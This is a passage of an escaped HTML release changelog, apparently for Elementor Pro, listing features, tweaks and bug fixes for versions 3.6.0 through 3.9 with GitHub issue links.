href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20678\\\">#20678<\\/a>)<\\/li>\\n<li>Fix: Hide Empty option is not working in Menu Cart widget<\\/li>\\n<li>Fix: The Stripe Button widget doesn\'t work in Templates<\\/li>\\n<\\/ul>\\n<h4>3.9.0 - 2022-12-06<\\/h4>\\n<ul>\\n<li>New: Added support for WooCommerce to Loop Builder (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20020\\\">#20020<\\/a>)<\\/li>\\n<li>Tweak: Added more options to \'Show up to X times\' advanced rule in Popups (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8187\\\">#8187<\\/a>)<\\/li>\\n<li>Tweak: Allow saving and reloading a page while editing in-place loop item template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19882\\\">#19882<\\/a>)<\\/li>\\n<li>Tweak: Added <code>$location param<\\/code> to <code>elementor\\/theme\\/get_location_templates\\/template_id<\\/code> hook (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18453\\\">#18453<\\/a>)<\\/li>\\n<li>Tweak: Removed redundant labels from group controls (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11666\\\">#11666<\\/a>)<\\/li>\\n<li>Tweak: Added support to use sections and columns as the layout structure of a Loop item template<\\/li>\\n<li>Tweak: Disabled movement when a repeater item is in focus in edit mode<\\/li>\\n<li>Tweak: Upgrade the autoprefixer package to better minify CSS files<\\/li>\\n<li>Tweak: Removed duplicate SQL queries on every page for better performance<\\/li>\\n<li>Tweak: Improved License validation mechanism to avoid limitations<\\/li>\\n<li>Tweak: Added more units options to Border Width control in various elements<\\/li>\\n<li>Tweak: Added <code>em<\\/code> units to Border Radius control in various elements<\\/li>\\n<li>Tweak: Added \'Equal height\' functionality to Loop Grid widget<\\/li>\\n<li>Fix: Issue with Related Products widget and WooCommerce Pixel Manager plugin (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16934\\\">#16934<\\/a>)<\\/li>\\n<li>Fix: My Account widget gets hidden when using a single page template with post content (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19627\\\">#19627<\\/a>)<\\/li>\\n<li>Fix: Cart is not updated when cache enabled in Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19312\\\">#19312<\\/a>)<\\/li>\\n<li>Fix: Entrance animations are not working as expected with Infinite Loop and Load on CLick pagination in Loop Grid widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20293\\\">#20293<\\/a>)<\\/li>\\n<li>Fix: Loading page issues in Form Submissions screen (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19973\\\">#19973<\\/a>)<\\/li>\\n<li>Fix: Recently Edited date and time not working as expected in Elementor Overview plugin in WordPress dashboard (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17966\\\">#17966<\\/a>)<\\/li>\\n<li>Fix: Recurring license mismatch error message when using translators plugins<\\/li>\\n<li>Fix: Submenu items triggers page transition instead of opening in Nav Menu widget<\\/li>\\n<li>Fix: Query values of Posts widget are not imported correctly when importing a Kit<\\/li>\\n<li>Fix: Loop items are exceeding the widget boundaries in Loop Grid widget<\\/li>\\n<li>Fix: Order by option is not working as expected when choosing Upsells, Cross-Sells and Related Products query in Products widget<\\/li>\\n<li>Fix: Various widgets disappear in certain scenarios when choosing direction Row or Column in Container<\\/li>\\n<\\/ul>\\n<h4>3.8.2 - 2022-11-20<\\/h4>\\n<ul>\\n<li>Fix: Z-index issues when applying sticky to Container<\\/li>\\n<li>Fix: Error message appears on front with Editor and Shop Manager roles when using the Loop Builder widget<\\/li>\\n<\\/ul>\\n<h4>3.8.1 - 2022-11-06<\\/h4>\\n<ul>\\n<li>Fix: Sticky inner section is not staying in the column when applying sticky option in Sections (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20203\\\">#20203<\\/a>)<\\/li>\\n<li>Fix: Post Title widget located in a loop item template disappears when enabling the hide title option inside page settings (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20207\\\">#20207<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20255\\\">#20255<\\/a>)<\\/li>\\n<li>Fix: ACF Dynamic data not rendering correctly in various scenarios (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20235\\\">#20235<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20258\\\">#20258<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20277\\\">#20277<\\/a>)<\\/li>\\n<li>Fix: Z-index issues when applying sticky to Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/20227\\\">#20227<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.8.0 - 2022-10-30<\\/h4>\\n<ul>\\n<li>New: Introducing Loop Builder as a beta status experiment - Create powerful & repeating loop templates and populate each one with dynamic content and design flexibility (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/4440\\\">#4440<\\/a>)<\\/li>\\n<li>Tweak: Add <code>wp_body_open()<\\/code> to header in Header template (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11562\\\">#11562<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15828\\\">#15828<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13089\\\">#13089<\\/a>)<\\/li>\\n<li>Tweak: Added support border-radius option to the Code Highlight widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14316\\\">#14316<\\/a>)<\\/li>\\n<li>Tweak: Import\\/Export CLI and UI mechanisms were merged into a unified service<\\/li>\\n<li>Tweak: User with no permission to Notes cannot be mentioned in a note<\\/li>\\n<li>Tweak: User with no permission to view a post cannot be mentioned in a note<\\/li>\\n<li>Tweak: Notes was added to the right click context-menu<\\/li>\\n<li>Tweak: Notes panel can be resizable<\\/li>\\n<li>Tweak: Notes panel can be dragged outside of the canvas in responsive mode in the editor<\\/li>\\n<li>Tweak: Updated form validation messages translation strings in Form widget<\\/li>\\n<li>Tweak: Updated translators comments<\\/li>\\n<li>Tweak: Theme Builder logo and Title should be clickable<\\/li>\\n<li>Tweak: Reduced API requests and DB calls on non-write setup<\\/li>\\n<li>Tweak: Added media queries to the Table of Contents widget<\\/li>\\n<li>Fix: Sticky option is not working as expected in various scenarios in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18357\\\">#18357<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19540\\\">#19540<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19618\\\">#19618<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19777\\\">#19777<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19827\\\">#19827<\\/a>)<\\/li>\\n<li>Fix: Mixed Content errors on HTTPS in Video Playlist Widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18895\\\">#18895<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18945\\\">#18945<\\/a>)<\\/li>\\n<li>Fix: Note\'s timestamp is being updated according to the last activity in Notes (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19123\\\">#19123<\\/a>)<\\/li>\\n<li>Fix: Accessibility attribute <code>role=navigation<\\/code> is redundant in Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17582\\\">#17582<\\/a>)<\\/li>\\n<li>Fix: Accessibility attribute <code>role=navigation<\\/code> is redundant in pagination in Posts widget<\\/li>\\n<li>Fix: Share buttons is accessible with keyboard but not clickable<\\/li>\\n<li>Fix: Sub-items icons style is missing in preview with Inline Font Icons experiment in Nav Menu widget<\\/li>\\n<li>Fix: Quotes are appearing as HTML when editing a note in Notes<\\/li>\\n<li>Fix: Label\'s Icon height increases when Inline Font Icons experiment is active in Hotspot Widget<\\/li>\\n<li>Fix: Sub conditions of templates are not overridden when importing a Kit<\\/li>\\n<li>Fix: X\\/Y Anchor Point controls were not visible for Scale and Rotate effects<\\/li>\\n<li>Fix: PHP warning notice appears in some situations when using motion effects<\\/li>\\n<\\/ul>\\n<h4>3.7.7 - 2022-09-20<\\/h4>\\n<ul>\\n<li>Fix: Default Flex Grow affects the layout when the container is set to direction Column in various widgets<\\/li>\\n<\\/ul>\\n<h4>3.7.6 - 2022-09-14<\\/h4>\\n<ul>\\n<li>Fix: Submissions menu item appears at the bottom of Elementor section in WordPress dashboard<\\/li>\\n<\\/ul>\\n<h4>3.7.5 - 2022-08-31<\\/h4>\\n<ul>\\n<li>Fix: Error message appears on front if WooCommerce is activated (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19553\\\">#19553<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.7.4 - 2022-08-29<\\/h4>\\n<ul>\\n<li>Tweak: PHP 5.6 Is deprecated<\\/li>\\n<li>Fix: Triangle icon is not being displayed in the Select field when Inline Font Icons Experiment is active in Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18598\\\">#18598<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/19495\\\">#19495<\\/a>)<\\/li>\\n<li>Fix: The page jumps or flickers to the video playlist on page reload in Video Playlist Widget<\\/li>\\n<\\/ul>\\n<h4>3.7.3 - 2022-07-31<\\/h4>\\n<ul>\\n<li>Tweak: Improved license mechanism for correct validation<\\/li>\\n<li>Fix: Sticky option causes unexpected results when using the Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18357\\\">#18357<\\/a>)<\\/li>\\n<li>Fix: Price list, Portfolio, Flip Box and Gallery widgets disappear when the direction is set to column in Container (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18880\\\">#18880<\\/a>)<\\/li>\\n<li>Fix: Quotes character is showing up as <code>&quot;<\\/code> when editing a note in Notes<\\/li>\\n<\\/ul>\\n<h4>3.7.2 - 2022-06-15<\\/h4>\\n<ul>\\n<li>Tweak: Applied optimized file handling in various modules<\\/li>\\n<li>Fix: Related posts query options are missing in Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18633\\\">#18633<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18641\\\">#18641<\\/a>)<\\/li>\\n<li>Fix: Menu Cart Icon is not being displayed on all browsers when Inline Font Icons Experiment is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17705\\\">#17705<\\/a>)<\\/li>\\n<li>Fix: Gallery widget is not working as expected in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18408\\\">#18408<\\/a>)<\\/li>\\n<li>Fix: Flip box is not visible when the direction is set to Row in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18413\\\">#18413<\\/a>)<\\/li>\\n<li>Fix: Portfolio widget is not visible when dragged into "Row" direction Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17653\\\">#17653<\\/a>)<\\/li>\\n<li>Fix: Menu cart is open automatically in Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18629\\\">#18629<\\/a>)<\\/li>\\n<li>Fix: PHP error is being shown the license is expired in License screen<\\/li>\\n<\\/ul>\\n<h4>3.7.1 - 2022-05-16<\\/h4>\\n<ul>\\n<li>Fix: Notes icon appears as an empty square in admin top bar for users with permissions lower than Editor<\\/li>\\n<li>Fix: Notes experiment causes a PHP fatal error on some cases<\\/li>\\n<li>Fix: UI glitches in Notes feature<\\/li>\\n<\\/ul>\\n<h4>3.7.0 - 2022-05-10<\\/h4>\\n<ul>\\n<li>New: Introducing Notes - Work collaboratively directly within Elementor<\\/li>\\n<li>New: Stripe Button widget - Collect Stripe payments directly from your site (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14748\\\">#14748<\\/a>)<\\/li>\\n<li>New: Meet WooCommerce Add to Cart dynamic tag - add products to cart from every widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10607\\\">#10607<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11801\\\">#11801<\\/a>)<\\/li>\\n<li>New: Added WooCommerce Product Content dynamic tag (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16367\\\">#16367<\\/a>)<\\/li>\\n<li>Tweak: Added Related, Upsells and Cross-Sells query sources to Products widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8071\\\">#8071<\\/a>)<\\/li>\\n<li>Tweak: Added custom icon control to Nav Menu widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18007\\\">#18007<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14357\\\">#14357<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13151\\\">#13151<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11361\\\">#11361<\\/a>)<\\/li>\\n<li>Tweak: Added an option to minimize on Desktop device in Table of Contents widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9933\\\">#9933<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Share Buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10729\\\">#10729<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Media Carousel widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10314\\\">#10314<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Form widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6327\\\">#6327<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6691\\\">#6691<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11774\\\">#11774<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9051\\\">#9051<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/6327\\\">#6327<\\/a>)<\\/li>\\n<li>Tweak: Added dynamic tag controls to Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5760\\\">#5760<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/9774\\\">#9774<\\/a>)<\\/li>\\n<li>Tweak: Added align button to bottom option in various Product widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10263\\\">#10263<\\/a>)<\\/li>\\n<li>Tweak: Added align button to bottom control in Posts and Archive Posts widgets<\\/li>\\n<li>Tweak: Added the ability to hide and show the coupon section in WooCommerce Cart widget<\\/li>\\n<li>Tweak: Added the ability to hide and show the coupon section in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added alignment option to various buttons in WooCommerce Cart widget<\\/li>\\n<li>Tweak: Added alignment option to various buttons in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added percentage unit to padding control in Additional Information customize section in WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added quick link to create new theme parts directly from the Finder<\\/li>\\n<li>Tweak: Added the option to add a custom template to Dashboard screen in My Account widget<\\/li>\\n<li>Tweak: Added spacing control to view cart button in various product widgets<\\/li>\\n<li>Tweak: Added the option to add a custom template to empty cart state in Cart widget<\\/li>\\n<li>Tweak: Adjusted the layout of the Payment Methods screen in the My Account widget<\\/li>\\n<li>Tweak: Added lazy load option to Media Carousel, Reviews and Testimonial Carousel widgets<\\/li>\\n<li>Tweak: Added Site Identity quick link to Logo widget<\\/li>\\n<li>Tweak: Added Site Identity quick link to Site Title widget<\\/li>\\n<li>Tweak: Created an attribute that allows disabling page transition for specific links<\\/li>\\n<li>Tweak: Added dynamic tag controls to Gallery widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Countdown widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Portfolio widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Price Table widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Login widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Blockquote widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Facebook Comments widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Post Navigation widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Search Form widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Author Box widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Post info widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Archive Posts widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Product Meta widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Archive Products widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Sitemap widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Reviews widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to Code Highlight widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to PayPal Button widget<\\/li>\\n<li>Tweak: Added dynamic tag controls to WooCommerce Checkout widget<\\/li>\\n<li>Tweak: Added missing PHP documentation to hooks<\\/li>\\n<li>Fix: Scrolling glitches on mobile devices when Sticky Effect is enabled (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17767\\\">#17767<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18330\\\">#18330<\\/a>)<\\/li>\\n<li>Fix: Only 1st honypot field is validated when using multiple honeypot fields in Forms widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18136\\\">#18136<\\/a>)<\\/li>\\n<li>Fix: Checkout button background color is not working as expected in Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18289\\\">#18289<\\/a>)<\\/li>\\n<li>Fix: Button labels are not accessible for screen readers in Share buttons widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8615\\\">#8615<\\/a>)<\\/li>\\n<li>Fix: Downloads titles controls are not working in responsive in WooCommerce Purchase Summary widget<\\/li>\\n<li>Fix: Excerpt length is not working as expected in Posts and Archive Posts widgets<\\/li>\\n<li>Fix: Titles & Totals weight is not working in WooCommerce Checkout widget<\\/li>\\n<li>Fix: Product image is not appearing on Single Product Page on template load<\\/li>\\n<li>Fix: Additional Information title not editable in some scenarios in WooCommerce Checkout widget<\\/li>\\n<li>Fix: Cart is not updating automatically on mobile in Cart widget<\\/li>\\n<li>Fix: UI Glitch in Masonry control in Portfolio widget<\\/li>\\n<li>Fix: Custom breakpoints experiment didn\'t work on Single post and page templates<\\/li>\\n<li>Fix: Testimonial carousel & Reviews widgets disregards the <code>alt<\\/code> attribute<\\/li>\\n<li>Fix: Playlist widget deeplink didn\'t send user directly to the widget in the page<\\/li>\\n<li>Fix: Masonry option causes the images to disappear in the Editor in Posts widget<\\/li>\\n<li>Fix: Scrollbar appears after clicking on the dropdown toggle in Nav Menu widget<\\/li>\\n<li>Fix: Custom icons disappear on frontend if the pack name contains numbers<\\/li>\\n<li>Fix: Custom Font disappears if the name contains only numbers<\\/li>\\n<li>Fix: <code>end-section()<\\/code> is missing from Progress Tracker and Facebook Embed widgets<\\/li>\\n<li>Tweak: Added a filter for conditions cache query in Theme Builder<\\/li>\\n<li>Fix: Customizations lost on Ajax refresh in WooCommerce Cart widget<\\/li>\\n<li>Fix: Hello theme Header and Footer experiment is not working when WooCommerce plugin is active<\\/li>\\n<li>Fix: Color controls are not working as expected in Checkout widget<\\/li>\\n<li>Fix: Color controls are not working as expected in My Account widget<\\/li>\\n<li>Fix: Empty state widget preview in the editor is disappearing in various widgets<\\/li>\\n<li>Fix: Cart is not updating automatically on mobile in WooCommerce Cart widget<\\/li>\\n<li>Deprecated: See all deprecations to this version in our <a href=\\\"https:\\/\\/developers.elementor.com\\/v3-7-planned-deprecations\\/\\\">Developers Deprecations Post<\\/a><\\/li>\\n<\\/ul>\\n<h4>3.6.5 - 2022-04-12<\\/h4>\\n<ul>\\n<li>Fix: Compatibility issues for several widgets in iOS 14 and macOS 13 devices (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18090\\\">#18090<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15910\\\">#15910<\\/a>)<\\/li>\\n<li>Fix: Button Alignment doesn\'t work in Custom Add To Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17810\\\">#17810<\\/a>)<\\/li>\\n<li>Fix: PHP warning is thrown in some cases in PayPal button widget<\\/li>\\n<li>Fix: PHP 8.1 throws errors and notices in some cases<\\/li>\\n<li>Fix: PHP notice was thrown when Kit Import process initiated without display conditions<\\/li>\\n<li>Fix: Create Account button always opens on the Sign Up screen even if the user has an account in Onboarding process<\\/li>\\n<\\/ul>\\n<h4>3.6.4 - 2022-03-15<\\/h4>\\n<ul>\\n<li>Tweak: Kit import dynamic reference support for templates and dynamic tags<\\/li>\\n<li>Tweak: Updated tested up to version tag to <code>3.6.0<\\/code><\\/li>\\n<li>Fix: Sticky caused scrolling issues after clicking an element that expands the page height (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17821\\\">#17821<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17839\\\">#17839<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18069\\\">#18069<\\/a>)<\\/li>\\n<li>Fix: When saving Global widget JS error is being thrown and editor fails to load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17954\\\">#17954<\\/a>)<\\/li>\\n<li>Fix: Motion effects are missing from Background section under Style tab in Container element (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/18063\\\">#18063<\\/a>)<\\/li>\\n<li>Fix: Imported Kit doesn\'t appear in the theme builder after successful import in some cases<\\/li>\\n<li>Fix: Added future Pro support to fix the Cart icon that shifted aside in Menu cart widget<\\/li>\\n<\\/ul>\\n<h4>3.6.3 - 2022-02-28<\\/h4>\\n<ul>\\n<li>Fix: Custom Code display conditions modal is not working (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17865\\\">#17865<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17942\\\">#17942<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17994\\\">#17994<\\/a>)<\\/li>\\n<li>Fix: Share buttons are not accessible for keyboard navigation (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8615\\\">#8615<\\/a>)<\\/li>\\n<\\/ul>\\n<h4>3.6.2 - 2022-02-14<\\/h4>\\n<ul>\\n<li>Fix: Auto updates mechanism is not working as expected (this version might be also installed automatically)<\\/li>\\n<\\/ul>\\n<h4>3.6.1 - 2022-02-09<\\/h4>\\n<ul>\\n<li>Tweak: Allow connecting via generic source for future feature support<\\/li>\\n<li>Fix: Custom Code doesn\'t work when WooCommerce is active (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17675\\\">#17675<\\/a>)<\\/li>\\n<li>Fix: Content animation didn\'t work when Improved asset loading experiment is active Slides widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17055\\\">#17055<\\/a>)<\\/li>\\n<li>Fix: PHP warning appears some times when trying to force-check for available updates<\\/li>\\n<li>Fix: Page transitions are being triggered when not needed<\\/li>\\n<li>Fix: Text alignment on Tablet responsive device affects base device in Testimonial Carousel widget<\\/li>\\n<li>Fix: Harden Submissions feature to prevent potential security issues<\\/li>\\n<li>Fix: Page Transitions Icon option Preloader doesn\'t work on frontend<\\/li>\\n<\\/ul>\\n<h4>3.6.0 - 2022-01-31<\\/h4>\\n<ul>\\n<li>New: WooCommerce Purchase Summary widget - Fully customize the content and style of your order summary page (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5756\\\">#5756<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15862\\\">#15862<\\/a>)<\\/li>\\n<li>New: WooCommerce Notices styling on Site Settings - Customize the appearance of WooCommerce notices (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/14570\\\">#14570<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/15896\\\">#15896<\\/a>)<\\/li>\\n<li>New: WooCommerce Notices widget - Set the position of WooCommerce notices on your shop pages (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/8124\\\">#8124<\\/a>)<\\/li>\\n<li>Experiment: Page Transitions - Customize the page loading experience, and increase brand recognition (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10576\\\">#10576<\\/a>)<\\/li>\\n<li>Tweak: Added WooCommerce & Theme Elements widgets to Improved CSS Loading experiment to save up 126KB per page load (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17412\\\">#17412<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17337\\\">#17337<\\/a>)<\\/li>\\n<li>Tweak: Added new layout options in WooCommerce Add To Cart and WooCommerce Custom Add To Cart widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5437\\\">#5437<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/10617\\\">#10617<\\/a>)<\\/li>\\n<li>Tweak: Added Stroke functionality for typography control in various widgets (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/11158\\\">#11158<\\/a>)<\\/li>\\n<li>Tweak: Removed <code>elementor-section-wrap<\\/code> by adding it to the Optimized DOM Output experiment (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16950\\\">#16950<\\/a>)<\\/li>\\n<li>Tweak: Added style controls for variations in WooCommerce Menu Cart widget<\\/li>\\n<li>Tweak: Added color control to navigation dots in Media Carousel, Reviews, and Slides widgets<\\/li>\\n<li>Tweak: Disabled Vimeo autoplay on edit mode when getting video data in Video Playlist widget<\\/li>\\n<li>Tweak: Added notice about Facebook\'s new EU consent policy in Facebook Button, Facebook Comments, Facebook Embed, and Facebook Page widgets<\\/li>\\n<li>Tweak: Refactor string translation calls to use native WP translation methods<\\/li>\\n<li>Tweak: Convert <code>home_url<\\/code> license API call to <code>get_site_url<\\/code> for better compatibility<\\/li>\\n<li>Tweak: Promoted Default to New Theme Builder and Scroll Snap experiments to Stable status in Experiments screen<\\/li>\\n<li>Tweak: Scroll Snap experiment set to active by default for all websites in Experiments screen<\\/li>\\n<li>Tweak: Scrolling Effects in Header and Section backgrounds are not working as expected when effects are relative to the entire page<\\/li>\\n<li>Tweak: Added "Auto Updates" capability to Pro versions<\\/li>\\n<li>Tweak: Removed sequenced animation hover effect option from Classic skin in Call to Action widget<\\/li>\\n<li>Tweak: Added "Excerpt Length" control in Post Excerpt widget<\\/li>\\n<li>Tweak: Deleted deprecated methods from Query Control module<\\/li>\\n<li>Tweak: Adjusted Inline-CSS Experiment to work with Additional Custom Breakpoints experiment<\\/li>\\n<li>Fix: Automatically open cart functionality didn\'t work in product page in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/5921\\\">#5921<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16276\\\">#16276<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16879\\\">#16879<\\/a>)<\\/li>\\n<li>Fix: Buttons are not visible when there are too many products in the cart in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16221\\\">#16221<\\/a>, <a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/17283\\\">#17283<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16333\\\">#16333<\\/a>,<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/13005\\\">#13005<\\/a>)<\\/li>\\n<li>Fix: Mini cart modal z-index is too low in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16333\\\">#16333<\\/a>)<\\/li>\\n<li>Fix: Side cart buttons are not visible at first glance on mobile in WooCommerce Menu Cart widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16221\\\">#16221<\\/a>)<\\/li>\\n<li>Fix: Read More field recognizes inline HTML elements as plain text in Posts and Archive Posts widget (<a href=\\\"https:\\/\\/github.com\\/elementor\\/elementor\\/issues\\/16985\\\">#16985<\\/a>)<\\/li>\\n<li>Fix: Load More functionality caused JS error 